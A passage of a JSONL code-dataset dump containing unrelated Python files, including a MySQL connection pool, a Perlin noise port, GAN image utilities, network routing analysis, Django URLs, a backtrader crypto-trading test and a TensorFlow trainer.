= self._max_pool_size\n\n def _free(self):\n \"\"\"\n 释放所有连接\n \"\"\"\n for connection in self:\n try:\n connection.close()\n except Exception as err:\n _ = err\n\n def _create_connection(self):\n \"\"\"\n 创建pymysql连接\n \"\"\"\n return Connection(host=self._host,\n user=self._user,\n password=self._password,\n database=self._database,\n port=self._port,\n charset=self._charset,\n cursorclass=self._cursor_class,\n **self._other_kwargs)\n","repo_name":"JeniTurtle/python-orm","sub_path":"libs/database/connect_pool/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":7929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73580911848","text":"\"\"\"Perlin noise\n\"\"\"\n\nimport math\n\nfrom random import Random\n\n\nPERLIN_YWRAPB = 4\nPERLIN_YWRAP = 1<>= 1;\n\n\ndef noise(*args):\n \"\"\"Computes the Perlin noise (1D, 2D, or 3D) value at the specified coords.\n \"\"\"\n global perlin, perlinRandom\n\n x = args[0]\n y = args[1] if len(args) > 1 else 0\n z = args[2] if len(args) > 2 else 0\n\n if perlinRandom is None:\n perlinRandom = Random()\n\n if perlin is None:\n perlin = [perlinRandom.random() for i in xrange(PERLIN_SIZE + 1)]\n\n x = abs(x)\n x = abs(x)\n z = abs(z)\n\n xi, yi, zi = int(x), int(y), int(z)\n xf, yf, zf = x - xi, y - yi, z - zi\n\n r = 0\n ampl = 0.5\n\n for i in range(perlin_octaves):\n of = xi + (yi<= 1.0: xi += 1; xf -= 1;\n if yf >= 1.0: yi += 1; yf -= 1;\n if zf >= 1.0: zi += 1; zf -= 1;\n\n return r;\n\n# [toxi 031112]\n# now adjusts to the size of the cosLUT used via\n# the new variables, defined above\ndef noise_fsc(i):\n # using bagel's cosine table instead\n return 0.5 * (1.0 - perlin_cos_table[int(i*perlin_PI) % perlin_TWOPI])\n\n# # [toxi 040903]\n# # make perlin noise quality user controlled to allow\n# # for different levels of detail. lower values will produce\n# # smoother results as higher octaves are surpressed\n\n# public void noiseDetail(int lod) {\n# if (lod>0) perlin_octaves=lod;\n# }\n\n# public void noiseDetail(int lod, float falloff) {\n# if (lod>0) perlin_octaves=lod;\n# if (falloff>0) perlin_amp_falloff=falloff;\n# }\n\ndef noiseSeed(what):\n global perlinRandom, perlin\n if perlinRandom is None:\n perlinRandom = Random()\n perlinRandom.seed(what)\n perlin = None\n\n","repo_name":"croach/p5.py","sub_path":"lib/p5/perlin.py","file_name":"perlin.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29128147111","text":"from tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.layers import (Dense, \n BatchNormalization, \n LeakyReLU, \n Reshape, \n Conv2DTranspose,\n Conv2D,\n Dropout,\n Flatten)\nfrom matplotlib import image\n\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport tensorflow_addons as tfa\n\nIMAGE_SIZE = [256, 256]\n\ndef decode_image(image):\n image = tf.image.decode_jpeg(image, channels=3)\n image = (tf.cast(image, tf.float32) / 127.5) - 1\n image = tf.reshape(image, [*IMAGE_SIZE, 3])\n return image\n\ndef read_tfrecord(example):\n tfrecord_format = {\n \"image\": tf.io.FixedLenFeature([], tf.string)\n }\n example = tf.io.parse_single_example(example, tfrecord_format)\n image = decode_image(example['image'])\n return image\n\ndef load_dataset(filenames):\n dataset = tf.data.TFRecordDataset(filenames)\n dataset = dataset.map(read_tfrecord)\n return dataset\n\ndef down_sample(filters, size, apply_instancenorm=True):\n initializer = tf.random_normal_initializer(0., 0.02)\n gamma_init = keras.initializers.RandomNormal(mean=0.0, stddev=0.02)\n\n layer = keras.Sequential()\n layer.add(layers.Conv2D(filters, size, strides=2, padding='same', kernel_initializer=initializer, use_bias=False))\n\n if apply_instancenorm:\n layer.add(tfa.layers.InstanceNormalization(gamma_initializer=gamma_init))\n\n layer.add(layers.LeakyReLU())\n\n return layer\n\ndef up_sample(filters, size, apply_dropout=False):\n initializer = tf.random_normal_initializer(0., 0.02)\n gamma_init = keras.initializers.RandomNormal(mean=0.0, stddev=0.02)\n\n layer = keras.Sequential()\n layer.add(layers.Conv2DTranspose(filters, size, strides=2, padding='same', kernel_initializer=initializer,use_bias=False))\n layer.add(tfa.layers.InstanceNormalization(gamma_initializer=gamma_init))\n\n if apply_dropout:\n layer.add(layers.Dropout(0.5))\n\n layer.add(layers.ReLU())\n\n return layer\n\ndef Generator():\n inputs = layers.Input(shape=[256,256,3])\n down_stack = [\n down_sample(64, 4, apply_instancenorm=False),# (size, 128, 128, 64)\n down_sample(128, 4), # (size, 64, 64, 128)\n down_sample(256, 4), # (size, 32, 32, 256)\n down_sample(512, 4), # (size, 16, 16, 512)\n down_sample(512, 4), # (size, 8, 8, 512)\n down_sample(512, 4), # (size, 4, 4, 512)\n down_sample(512, 4), # (size, 2, 2, 512)\n down_sample(512, 4), # (size, 1, 1, 512)\n ]\n\n up_stack = [\n up_sample(512, 4, apply_dropout=True), # (size, 2, 2, 1024)\n up_sample(512, 4, apply_dropout=True), # (size, 4, 4, 1024)\n up_sample(512, 4, apply_dropout=True), # (size, 8, 8, 1024)\n up_sample(512, 4), # (size, 16, 16, 1024)\n up_sample(256, 4), # (size, 32, 32, 512)\n up_sample(128, 4), # (size, 64, 64, 256)\n up_sample(64, 4), # (size, 128, 128, 128)\n ]\n\n initializer = tf.random_normal_initializer(0., 0.02)\n last = layers.Conv2DTranspose(3, 4, strides=2, padding='same', kernel_initializer=initializer, activation='tanh') \n # (size, 256, 256, 3)\n\n x = inputs\n\n # Downsampling through the model\n skips = []\n for down in down_stack:\n x = down(x)\n skips.append(x)\n\n skips = reversed(skips[:-1])\n\n # Upsampling and establishing the skip connections\n for up, skip in zip(up_stack, skips):\n x = up(x)\n x = layers.Concatenate()([x, skip])\n\n x = last(x)\n\n return keras.Model(inputs=inputs, outputs=x)\n\ndef make_generator_model():\n model = tf.keras.Sequential()\n model.add(Dense(7*7*512, use_bias=False, input_shape=(256,))) #originally 7*7*7, 256*256\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n\n model.add(Reshape((7,7,512)))#was 7,7,512\n# assert model.output_shape == (None, 7, 7, 512) # Note: None is the batch size\n model.add(Conv2DTranspose(128, (5, 5), strides=(1, 1), padding='same', use_bias=False)) #originally 128\n# assert model.output_shape == (None, 7, 7, 128)\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n \n model.add(Conv2DTranspose(64, (5, 5), strides=(2, 2), padding='same', use_bias=False)) #originally 64\n# assert model.output_shape == (None, 14, 14, 64)\n model.add(BatchNormalization())\n model.add(LeakyReLU())\n\n model.add(Conv2DTranspose(3, (5, 5), strides=(2, 2), padding='same', use_bias=False, activation='tanh'))#originally 3\n# print(model.output_shape)\n# assert model.output_shape == (None, 28, 28, 3)\n return model\n\n\ndef randomNoiseModel(file):\n gen = make_generator_model()\n gen.load_weights('models/generator4.h5')\n\n noise = tf.random.normal([3, 256])*127.5+100\n plt.imsave('static/input.png', noise.numpy())#.clip(0, 1))\n\n modelOutput = gen(noise)[0]\n plt.imsave(f'static/{file}', modelOutput.numpy().clip(0, 1))\n\n\ndef monetModel(fileIn, fileOut):\n\n print(fileIn)\n monet_generator = Generator()\n monet_generator.load_weights('models/vangogh_generator.h5')\n for img in load_dataset(f'static/{fileIn}').batch(1):\n inputImage = img\n\n inputSaveImage = inputImage[0].numpy().clip(0,1)\n plt.imsave('static/input.png', inputSaveImage)\n\n #inputImage = image.imread(f'static/test3.jpg')\n\n #monet_ds = load_dataset(MONET_FILENAMES).batch(1)\n #modelInput = tf.reshape(tf.convert_to_tensor(image.imread(f'static/test3.jpg')), [1, 256, 256, 3])\n #modelInput = tf.random.normal([1, 256, 256, 3])#*127.5+100\n \n\n #modelOutput = monet_generator(modelInput)[0]\n modelOutput = monet_generator(inputImage, training=False)[0].numpy().clip(0,1)\n plt.imsave(f'static/{fileOut}', modelOutput)","repo_name":"CornellDataScience/GAN-Art-Generation","sub_path":"flask-app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13821988038","text":"from math import sqrt\nimport numpy as np\nfrom KJ import grad_projected\nfrom JS import barrier_method\n\n\nc = 3e5 # km / sec\n# Return path delay between two nodes\n\n\ndef delay(loc_1, loc_2):\n x = loc_1[0] - loc_2[0]\n y = loc_1[1] - loc_2[1]\n return sqrt(x * x + y * y) / c * 10 # multiplied by 10 for scaling\n\n\ndef delay_return(locations_source, locations_server):\n '''\n\tInputs: two layers location coordinates (array)\n\tOutputs: two layers delay matrix (array)\n\t'''\n\n m = len(locations_source)\n n = len(locations_server)\n delay_matrix = np.zeros((m, n))\n for i in range(m):\n for k in range(n):\n delay_matrix[i, k] = delay(locations_source[i], locations_server[k])\n return delay_matrix\n\n\ndef analytic_avg_delay_two_layers(arrival_rates, service_rates, delta, A):\n \"\"\"\n :param arrival_rates: arrival_rates (array, 1 by m size)\n :param service_rates: service_rates (array, 1 by n size)\n :param delta:\n :param A: routing probabilities (array m by n size)\n :return: expected service time including propagation delay considering just two layers\n \"\"\"\n\n m = len(arrival_rates)\n n = len(service_rates)\n lambda_hat = np.matmul(arrival_rates, A)\n res_sum = 0\n for i in range(m):\n res_sum += np.dot(A[i, :], 1 / (service_rates - lambda_hat) + delta[i, :]) * arrival_rates[i]\n return res_sum / sum(arrival_rates)\n\n\ndef analytic_avg_delay(rates, delta, routing_p, vol_dec):\n \"\"\"\n :param rates: [array (rates in layer 0), array (rates in layer 1), ...]\n :param delta:\n :param routing_p: routing probabilities [array (routing probabilites in layer 0), array (routing probabilites in layer 1), ...]\n :param vol_dec:\n :return: expected service time including propagation delay\n \"\"\"\n layer_num = len(rates)\n lambda_hat = [np.zeros((1, len(rates[i]))) for i in range(layer_num)]\n lambda_hat[0] = rates[0]\n for i in range(1, layer_num):\n lambda_hat[i] = np.matmul(lambda_hat[i - 1], routing_p[i - 1])\n test = rates[i] - lambda_hat[i]\n if test[test <= 0]:\n print(\"Initial A is wrong!\")\n return 1\n res_sum = 0\n for i in range(layer_num - 1):\n res_sum += analytic_avg_delay_two_layers(lambda_hat[i], rates[i + 1] / vol_dec[:i+1].prod(), delta[i], routing_p[i])\n return res_sum\n\n\ndef no_delay_optimal(arrival_rates, service_rates):\n '''\n \tFind the optimal completion time using Lagrange multiplier for a network without propagation delays\n \tconsidering only two layers\n '''\n n = len(service_rates)\n num = 0\n for j in range(n):\n num += sqrt(service_rates[j])\n denom = sum(service_rates) - sum(arrival_rates)\n K = pow(num / denom, 2)\n lambda_hat = np.zeros((n, 1))\n for j in range(n):\n lambda_hat[j] = service_rates[j] - sqrt(service_rates[j]/K)\n service_time = 0\n for j in range(n):\n service_time += lambda_hat[j] / (service_rates[j] - lambda_hat[j])\n service_time = service_time / sum(arrival_rates)\n result = {'lambda_hat': lambda_hat, 'Mean_completion_time': service_time}\n return result\n\n\ndef cur_vol(cur_layer_index, layer_dic, vol_dec):\n data_type_num = len(layer_dic.keys())\n res = np.ones(data_type_num)\n for i in range(data_type_num):\n for j in range(cur_layer_index + 1):\n res[i] *= vol_dec[i, j]\n return res\n\n\ndef effective_rates(arrival_rates, service_rates, cur_layer_index, layer_dic, data_dist, vol_dec):\n data_type_num = len(data_dist)\n effective_dist = np.zeros(data_type_num)\n data_vol = cur_vol(cur_layer_index, layer_dic, vol_dec)\n for i in range(data_type_num):\n if layer_dic[i].count(cur_layer_index + 1) > 0:\n effective_dist[i] = data_dist[i]\n eff_arrival_rates = arrival_rates * sum(effective_dist)\n eff_service_rates = service_rates / (np.dot(data_vol, effective_dist) / sum(effective_dist))\n return [eff_arrival_rates, eff_service_rates]\n\n\ndef grad_multi_layers(rates, delta, layer_dic, data_type_dist, vol_dec):\n layer_num = len(rates)\n optimal_a = []\n source_rates = rates[0]\n for l in range(layer_num - 2):\n temp_arr_rates = source_rates\n temp_ser_rates = rates[l + 1]\n eff_rates = effective_rates(temp_arr_rates, temp_ser_rates, l, layer_dic, data_type_dist, vol_dec)\n eff_arr_rates = eff_rates[0]\n eff_ser_rates = eff_rates[1]\n if sum(eff_arr_rates) == 0: # just passing through the layer\n temp_a = np.ones((len(eff_arr_rates), len(eff_ser_rates))) / len(eff_ser_rates)\n else:\n initial_a = valid_initial_rates(eff_arr_rates, eff_ser_rates, 0.9)\n temp_res = grad_projected(eff_arr_rates, eff_ser_rates, delta[l], initial_a)\n temp_a = temp_res['A']\n optimal_a.append(temp_a)\n source_rates = np.matmul(source_rates, temp_a)\n last_layer_num = len(rates[layer_num - 2])\n optimal_a.append(np.ones((last_layer_num, 1)))\n return optimal_a\n\n\ndef barrier_multi_layers(rates, delta, layer_dic, data_type_dist, vol_dec):\n layer_num = len(rates)\n optimal_a = []\n source_rates = rates[0]\n for l in range(layer_num - 2):\n temp_arr_rates = source_rates\n temp_ser_rates = rates[l + 1]\n eff_rates = effective_rates(temp_arr_rates, temp_ser_rates, l, layer_dic, data_type_dist, vol_dec)\n eff_arr_rates = eff_rates[0]\n eff_ser_rates = eff_rates[1]\n if sum(eff_arr_rates) == 0: # just passing through the layer\n temp_a = np.ones((len(eff_arr_rates), len(eff_ser_rates))) / len(eff_ser_rates)\n else:\n initial_a = valid_initial_rates(eff_arr_rates, eff_ser_rates, 0.9)\n temp_res = barrier_method(eff_arr_rates, eff_ser_rates, delta[l], initial_a)\n temp_a = temp_res['A']\n optimal_a.append(temp_a)\n source_rates = np.matmul(source_rates, temp_a)\n last_layer_num = len(rates[layer_num - 2])\n optimal_a.append(np.ones((last_layer_num, 1)))\n return optimal_a\n\n\ndef valid_initial_rates(source_rates, server_rates, para):\n \"\"\"\n :param source_rates: source rates (array)\n :param server_rates: server rates (array)\n :param para: parameter for finding initial rates\n :return: valid initial routing probabilities that guarantees queue stability\n \"\"\"\n eps = 0.001\n sources_num = len(source_rates)\n servers_num = len(server_rates)\n initial_a = eps * np.ones((sources_num, servers_num))\n for i in range(servers_num):\n temp = np.ones(sources_num) * para * server_rates[i] / np.sum(source_rates)\n initial_a[:, i] = np.minimum(temp, 1 - np.sum(initial_a, 1) + initial_a[:, i])\n source_rates = np.matmul(source_rates.reshape((1, sources_num)), initial_a).flatten()\n # print(server_rates - source_rates) # to check validity\n return initial_a\n\n\ndef legacy_optimal_routing(locations):\n \"\"\"\n :param locations: coordinates info for spatial distribution of nodes in the network\n :return: a, (list that consists of arrays) the optimal routing probability in the legacy network\n \"\"\"\n layer_num = len(locations)\n a = [np.zeros((len(locations[i]), len(locations[i + 1]))) for i in range(layer_num - 1)]\n for i in range(layer_num - 1):\n for j in range(len(locations[i])):\n delay_info = [delay(locations[i][j], locations[i + 1][k]) for k in range(len(locations[i + 1]))]\n min_delay_index = np.argmin(delay_info)\n a[i][j][min_delay_index] = 1\n return a\n\n\ndef bandwidth_efficiency(vol_dec, data_type_dist, layer_dic, source_rates):\n \"\"\"\n :param vol_dec: (array), volume decrease ratio after processing in each layer for each data type\n :param data_type_dist: (array), data type distribution\n :param layer_dic: (dictionary), required layer info for each data type\n :param source_rates: (array), source rates in the network\n :return: res, bandwidth efficiency which is proportion to the product of rate and data volume\n \"\"\"\n layer_num = np.size(vol_dec, axis=1)\n res = 0\n data_type_num = len(data_type_dist)\n departure_process_rate = sum(source_rates)\n for l in range(layer_num - 1):\n temp_dist = np.zeros(data_type_num)\n for i in range(data_type_num):\n temp_max_layer = max(layer_dic[i])\n if temp_max_layer > l:\n temp_dist[i] = data_type_dist[i]\n cur_vol_temp = cur_vol(l, layer_dic, vol_dec)\n avg_data_vol = np.dot(cur_vol_temp, temp_dist)\n res += avg_data_vol\n return departure_process_rate * res\n\n\ndef bandwidth_efficiency_compare(data_type_dist, source_rates, layer_dic, vol_dec):\n \"\"\"\n :param data_type_dist: (array), data type distribution\n :param source_rates: (array), source rates in the network\n :param layer_dic: (dictionary), required layer info for each data type\n :param vol_dec: (array), volume decrease ratio after processing in each layer for each data type\n :return: res, ratio of bandwidth usages between in-network processing and legacy networks\n \"\"\"\n data_type_num = len(data_type_dist)\n layer_num = np.size(vol_dec, axis=1)\n legacy_vol_dec = np.ones((data_type_num, layer_num))\n legacy_data_type_dist = np.array([1])\n legacy_layer_dic = {0: [0, layer_num - 1]}\n b_e_legacy = bandwidth_efficiency(legacy_vol_dec, legacy_data_type_dist, legacy_layer_dic, source_rates)\n b_e_in_network_processing = bandwidth_efficiency(vol_dec, data_type_dist, layer_dic, source_rates)\n res = b_e_in_network_processing / b_e_legacy\n return res\n\n\ndef avg_last_layer(data_type_dist, layer_dic):\n \"\"\"\n :param data_type_dist: (array), data type distribution\n :param layer_dic: (dictionary), required layer info for each data type\n :return: res, average last layer\n \"\"\"\n temp = list(layer_dic.values())\n temp_max = np.array([max(temp[i]) for i in range(len(data_type_dist))])\n res = np.dot(data_type_dist, temp_max)\n return res\n\n\ndef avg_sum_required_layer(data_type_dist, layer_dic):\n \"\"\"\n :param data_type_dist: (array), data type distribution\n :param layer_dic: (dictionary), required layer info for each data type\n :return: res, expected sum of the required layers\n \"\"\"\n temp = list(layer_dic.values())\n temp_sum = np.array([sum(temp[i]) for i in range(len(data_type_dist))])\n res = np.dot(data_type_dist, temp_sum)\n return res\n\n","repo_name":"Youngrock-Oh/Data_centric_network","sub_path":"Analytic_res.py","file_name":"Analytic_res.py","file_ext":"py","file_size_in_byte":10392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74742277929","text":"import time\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nclass TestHandler(FileSystemEventHandler):\n def on_any_event(self, event):\n print(f\"Event detected: {event}\")\n\nobserver = Observer()\nevent_handler = TestHandler()\nobserver.schedule(event_handler, path='C:\\\\Users\\\\oropesa\\\\Documents\\\\Magicus', recursive=True)\nobserver.start()\n\ntry:\n while True:\n time.sleep(1)\nexcept KeyboardInterrupt:\n observer.stop()\nobserver.join()\n#this is just a commentdsfgdggggbg","repo_name":"thepwnman33/Magicus","sub_path":"test_watch.py","file_name":"test_watch.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70275139690","text":"import pandas_gbq\n\n\nclass BigQueryExporter:\n def __init__(self, credentials, project_id, table_name):\n self.credentials = credentials\n self.project_id = project_id\n self.table_name = table_name\n\n def export(self, df):\n pandas_gbq.to_gbq(\n dataframe=df,\n destination_table=self.table_name,\n project_id=self.project_id,\n if_exists='append')\n","repo_name":"crazydev71/ga-export","sub_path":"jobs/exporters/big_query_exporter.py","file_name":"big_query_exporter.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26678415217","text":"from django.urls import path, include\nfrom . import views\nfrom .views import *\nfrom rest_framework import routers\n\nrouter = routers.SimpleRouter()\nrouter.register(r'books_api', views.BookViewSet)\nrouter.register(r\"author_books\", views.Author_BookViewSet)\nrouter.register(r\"author_book_detail\", views.Author_Book_DetailViewSet)\nrouter.register(r\"book_detail\", views.Book_DetailViewSet)\nrouter.register(r\"collection_API\", views.Collection_API_ReturnViewSet)\nrouter.register(r\"subject_book_API\", views.Subject_API_ReturnViewSet)\nrouter.register(r\"audiobook_api\", views.AudioBookViewSet, basename=\"audiobooks\")\n#router.register(r\"multiplebooks\", views.ReadingListSearchView, basename=\"readinglist\")\n\n#router.register(r\"booksearch\", views.BookSearch)\n\nurlpatterns = [\n path('', views.books),\n path('', include(router.urls)),\n path('booksearch/', views.BookSearch.as_view(), name=\"BookSearch\"),\n path('authorsearch/', views.AuthorSearch.as_view(), name=\"AuthorSearch\"),\n path('subjectsearch/', views.SubjectSearch.as_view(), name=\"SubjectSearch\"),\n path('collectionsearch/', views.CollectionSearch.as_view(), name=\"CollectionSearch\"),\n path('bookbyid/', views.BookById.as_view(), name=\"BookByID\"),\n path('collections/', views.Collections.as_view(), name=\"Collections\"),\n path(\"author_book//\", Author_BookAPIView.as_view(), name=\"AuthorBookLookup\"),\n path(\"collection_book//\", Collection_BookAPIView.as_view(), name=\"CollectionBookLookup\"),\n path(\"bookmetadata//\", BookMetaDataView.as_view(), name=\"MetaData\"),\n path(\"bookmetadatalookup//\", BookMetaDataLookupAPIView.as_view(), name=\"MetaDataLookup\"),\n path(\"audiobooks//\", AudioBookView.as_view(), name=\"AudioBookLookup\"),\n\n #path(\"collection_api/\", Collection_API_ReturnViewSet.as_view(), name=\"CollectionAPI\"),\n #path(\"testing/\", views.testAPI.as_view(), name=\"Testing\"),\n #path(\"author_book_detail\", Author_Book_DetailViewSet.as_view(), name=\"AuthorBookDetail\"),\n]\n","repo_name":"rdmullins/rm-ereader-backend","sub_path":"e_reader/ereader/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1784910433","text":"import sys\nimport os\nimport sys\nsys.path.append('.')\nfrom ccxtbt import CCXTStore\nimport backtrader as bt\nfrom utils.helper import init_env, get_env\nimport logging.config\nimport time\nfrom tools.telegram import Telegram\nfrom datetime import datetime, timedelta\n\n\nclass OneBuy(bt.Strategy):\n\n def __init__(self):\n self.m = 0\n\n def log(self, txt, dt=None):\n dt = dt or self.datas[0].datetime.datetime(0)\n print(f'{dt} {txt}') # Print date and close\n\n def notify_data(self, data, status, *args, **kwargs):\n dn = data._name\n msg = f'{dn} Data Status: {data._getstatusname(status)}'\n self.log(msg, datetime.utcnow())\n if data._getstatusname(status) == 'LIVE':\n self.live_data = True\n else:\n self.live_data = False\n\n def notify_order(self, order):\n self.log(\n f\"Order: {order.ordtypename()}, Status: {order.getstatusname()}, Price: {order.executed.price}, Size: {order.executed.size}, Alive: {order.alive()}\"\n )\n\n def next(self):\n if not self.live_data: return\n if self.m == 0:\n data = self.datas[0]\n self.buy(data)\n self.m = 1\n self.log(\"buy\")\n\n\nif __name__ == '__main__':\n\n init_env()\n logging.config.fileConfig(\"logging.ini\")\n logging.Formatter.converter = time.gmtime #utc\n cerebro = bt.Cerebro(quicknotify=True)\n\n # Add the strategy\n cerebro.addstrategy(OneBuy)\n cerebro.addanalyzer(Telegram)\n\n # Create our store\n config = { 'apiKey': get_env('B_APIKEY'), 'secret': get_env('B_SECRET'), 'enableRateLimit': True }\n if get_env(\"PROXY\") == '1':\n config['requests_trust_env'] = True\n\n # IMPORTANT NOTE - Kraken (and some other exchanges) will not return any values\n # for get cash or value if You have never held any BNB coins in your account.\n # So switch BNB to a coin you have funded previously if you get errors\n store = CCXTStore(exchange='binanceusdm', currency='USDT', config=config, retries=10, debug=False)\n\n # Get the broker and pass any kwargs if needed.\n # ----------------------------------------------\n # Broker mappings have been added since some exchanges expect different values\n # to the defaults. Case in point, Kraken vs Bitmex. NOTE: Broker mappings are not\n # required if the broker uses the same values as the defaults in CCXTBroker.\n broker_mapping = {\n 'order_types': {\n bt.Order.Market: 'market',\n bt.Order.Limit: 'limit',\n bt.Order.Stop: 'stop-loss', #stop-loss for kraken, stop for bitmex\n bt.Order.StopLimit: 'stop limit'\n },\n 'mappings': {\n 'closed_order': {\n 'key': 'status',\n 'value': 'closed'\n },\n 'canceled_order': {\n 'key': 'status',\n 'value': 'canceled'\n }\n }\n }\n\n broker = store.getbroker(broker_mapping=broker_mapping)\n cerebro.setbroker(broker)\n\n # Get our data\n # Drop newest will prevent us from loading partial data from incomplete candles\n hist_start_date = datetime.utcnow() - timedelta(minutes=(220 + 6) * 5)\n data = store.getdata(\n dataname='ETC/USDT',\n name=\"ETCUSDT\",\n timeframe=bt.TimeFrame.Minutes,\n fromdate=hist_start_date,\n compression=5,\n ohlcv_limit=99999,\n drop_newest=True,\n # historical=True\n )\n\n # Add the feed\n cerebro.adddata(data)\n\n cerebro.broker.setcommission(commission=0.0004, margin=0.1, mult=1.0)\n cerebro.addsizer(bt.sizers.FixedSize, stake=1)\n\n # Run the strategy\n cerebro.run()","repo_name":"xiangxn/backtrader-example","sub_path":"tests/test_live.py","file_name":"test_live.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"16364557095","text":"import sys \ninput = sys.stdin.readline\nn = int(input()) # 토핑 종류의 수 n\na, b = map(int, input().split()) # 도우의 가격 a , 토핑의 가격 b\nc = int(input()) # 도우의 열량 c\ntopping = [] # 토핑의 열량 리스트\nfor _ in range(n):\n topping.append(int(input()))\ntopping.sort(reverse=True) # 내림차순 정렬\n\nresult = c / a # 토핑을 0개 선택했을 경우\nfor i in range(1, len(topping)+1): # 토핑을 1개 이상 선택했을 경우\n calory = c + sum(topping[0:i]) # 피자의 열량\n price = a + (b*i) # 피자의 가격\n if calory / price > result: # max인지 판단\n result = calory / price\n else:\n break\n \nprint(int(result))","repo_name":"letmeloveyou82/Algorithm","sub_path":"Python/BOJ/그리디/5545.py","file_name":"5545.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10592226082","text":"from core.base_train import BaseTrain\nfrom tqdm import tqdm\nfrom misc.utils import SetFromFlat, GetFlat, unflatten, flatten, numel\nimport numpy as np\nimport tensorflow as tf\n\n\nclass Trainer(BaseTrain):\n def __init__(self, sess, model, train_loader, test_loader, config, logger):\n super(Trainer, self).__init__(sess, model, config, logger)\n self.train_loader = train_loader\n self.test_loader = test_loader\n\n self.get_params = GetFlat(self.sess, self.model.params_net)\n self.set_params = SetFromFlat(self.sess, self.model.params_net)\n self.unflatten = unflatten(self.model.params_net)\n self.norm_list = []\n\n self.summary_op = tf.summary.merge_all()\n\n def init_kfac(self):\n self.logger.info('Roger Initialization!')\n self.model.optim._fisher_est.reset(self.sess)\n\n for itr, (x, y) in enumerate(self.train_loader):\n feed_dict = {\n self.model.inputs: x,\n # self.model.targets: y,\n self.model.is_training: True\n }\n self.sess.run(self.model.optim.init_cov_op, feed_dict=feed_dict)\n self.model.optim._fisher_est.rescale(self.sess, 1. / len(self.train_loader))\n\n # inverse\n if self.model.inv_update_op is not None:\n self.sess.run(self.model.inv_update_op)\n\n self.logger.info('Done Roger Initialization!')\n\n def train(self):\n if self.config.roger_init:\n self.init_kfac()\n for cur_epoch in range(self.config.epoch):\n self.logger.info('epoch: {}'.format(int(cur_epoch)))\n self.train_epoch()\n self.test_epoch()\n\n if cur_epoch % 100 == 0:\n self.model.save(self.sess)\n\n def train_epoch(self):\n loss_list = []\n acc_list = []\n\n for itr, (x, y) in enumerate(tqdm(self.train_loader)):\n feed_dict = {\n self.model.inputs: x,\n self.model.targets: y,\n self.model.is_training: True,\n }\n self.sess.run(self.model.train_op, feed_dict=feed_dict)\n cur_iter = self.model.global_step_tensor.eval(self.sess)\n\n if cur_iter % self.config.get('TCov', 10) == 0 and self.model.cov_update_op is not None:\n self.sess.run(self.model.cov_update_op, feed_dict=feed_dict)\n\n if cur_iter % self.config.get('TInv', 100) == 0 and self.model.inv_update_op is not None:\n self.sess.run(self.model.inv_update_op)\n\n for itr, (x, y) in enumerate(self.train_loader):\n feed_dict = {\n self.model.inputs: x,\n self.model.targets: y,\n self.model.is_training: True\n }\n\n loss, acc = self.sess.run(\n [self.model.loss, self.model.acc],\n feed_dict=feed_dict)\n loss_list.append(loss)\n acc_list.append(acc)\n\n avg_loss = np.mean(loss_list)\n avg_acc = np.mean(acc_list)\n self.logger.info(\"[Train] loss: %5.4f | accuracy: %5.4f\"%(float(avg_loss), float(avg_acc)))\n\n l2_norm = self.sess.run(self.model.l2_norm)\n self.logger.info(\"l2_norm: %5.4f\"%(float(l2_norm)))\n\n # summarize\n summaries_dict = dict()\n summaries_dict['train_loss'] = avg_loss\n summaries_dict['train_acc'] = avg_acc\n summaries_dict['l2_norm'] = l2_norm\n\n # summarize\n cur_iter = self.model.global_step_tensor.eval(self.sess)\n self.summarizer.summarize(cur_iter, summaries_dict=summaries_dict)\n\n def test_epoch(self):\n loss_list = []\n acc_list = []\n for (x, y) in self.test_loader:\n feed_dict = {\n self.model.inputs: x,\n self.model.targets: y,\n self.model.is_training: False\n }\n loss, acc = self.sess.run([self.model.loss, self.model.acc], feed_dict=feed_dict)\n loss_list.append(loss)\n acc_list.append(acc)\n\n avg_loss = np.mean(loss_list)\n avg_acc = np.mean(acc_list)\n self.logger.info(\"[Test] loss: %5.4f | accuracy: %5.4f\"%(float(avg_loss), float(avg_acc)))\n\n # summarize\n summaries_dict = dict()\n summaries_dict['test_loss'] = avg_loss\n summaries_dict['test_acc'] = avg_acc\n\n # summarize\n cur_iter = self.model.global_step_tensor.eval(self.sess)\n self.summarizer.summarize(cur_iter, summaries_dict=summaries_dict)\n\n\n","repo_name":"gd-zhang/Weight-Decay","sub_path":"core/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"70700699047","text":"from PySide import QtCore, QtGui\nfrom functools import partial\n\ndef add_spinbox(label, parent_layout, min=None, max=None, default=None, double_spinbox=False):\n \n horiz_layout = QtGui.QHBoxLayout()\n parent_layout.addLayout(horiz_layout)\n\n label = QtGui.QLabel(label)\n label.setMinimumWidth(100)\n horiz_layout.addWidget(label)\n\n horiz_layout.addStretch()\n\n spinbox = QtGui.QSpinBox() if not double_spinbox else QtGui.QDoubleSpinBox()\n\n if min:\n spinbox.setMinimum(min)\n if max:\n 